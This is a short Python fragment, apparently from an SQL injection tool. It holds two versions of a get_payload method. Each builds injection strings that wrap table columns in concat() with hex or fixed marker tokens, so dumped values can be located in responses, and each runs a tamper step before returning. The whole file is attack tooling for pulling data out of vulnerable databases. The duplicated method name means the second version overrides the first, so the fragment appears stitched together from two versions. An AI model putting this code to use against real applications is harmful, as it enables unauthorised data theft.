def get_payload(self,
table_name,
col_name,
i="0",
index="1",
value=""): # (index,vaule) is used blind
cols = []
token = ""
for col in col_name:
cols.append(col)
token = random_str()
hex_str = format_hex(token)
cat_fun = "concat(%s)"
# cat_str = cat_fun.replace('%s', "{pre},user(),{suf}".format(pre = hex_str,suf = hex_str)) # conlumns strings
cols.insert(0, '1')
cols.append('1')
link_char = "," + hex_str + ","
cat_str = cat_fun.replace('%s', "{conulmns}".format(
conulmns=(link_char).join(cols))) # conlumns strings
boundary = SEP_CHAR + self.boundary.replace('%value', value).replace(
'%index', index)
query = self.query.replace('t_n', table_name).replace('%s',
cat_str).replace(
'%d', i)
boundary, query = tamper(boundary, query)
payload = boundary
payload = payload.replace('%query', query)
payload = format_data(payload)
if conf.debug:
logger.success(payload)
return payload, token
def get_payload(self,table_name,col_name,i="1",index="1",value=""): # (index,vaule) is used blind
cols = []
token = ":--:"
for col in col_name:
cols.append(col)
cat_str = cols[0]
boundary =SEP_CHAR + self.boundary.replace('%value',value).replace('%index',index)
query = self.query.replace('t_n',table_name).replace('%s', cat_str).replace('%d', i)
boundary,query = tamper(boundary,query)
payload = boundary
payload = payload.replace('%query',query)
payload = format_data(payload)
if conf.debug:
logger.success(payload)
return payload,token